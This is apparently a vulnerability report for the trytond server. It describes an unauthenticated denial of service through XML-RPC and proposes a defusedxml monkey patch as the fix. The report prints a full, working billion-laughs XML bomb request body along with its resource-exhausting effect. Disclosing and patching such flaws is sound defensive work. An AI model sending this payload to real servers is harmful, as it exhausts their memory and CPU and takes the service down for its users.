A non authenticated user can cause a denial of service with a single request using an xml bomb attack on xmlrpc
Tested against trytond 6.2 with Python 3.8.10
A non authenticated user can saturate the trytond server's memory and CPU usage with a single xmlrpc request , using the billion laughs attack or other similar "xml bomb" attacks.
Request example [ do not test it against a production server of course :) ] :
url : http//example.trytond.com/ method: POST
headers: Content-Type: text/xml
body:
<?xml version='1.0'?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<methodCall>
<methodName>&lol9;</methodName>
<params>
</params>
</methodCall>
When the trytond server receives the request, its RAM usage quickly skyrockets, and the CPU also becomes very busy. When testing the request on my machine, the 16GB of RAM and 1 GB swap were full in under a minute.
defusedxml has a monkey patch for this.
If we use this monkey patch by adding the following to to trytond/protocols/xmlrpc.py:
from defusedxml.xmlrpc import monkey_patch
monkey_patch()
then the server will respond to the same request with :
"400 Bad Request: Unable to read XMl request". (because the monkey patch forbids it)
So, it does looks like a simple protection against this attack and similar "xml bomb" attacks.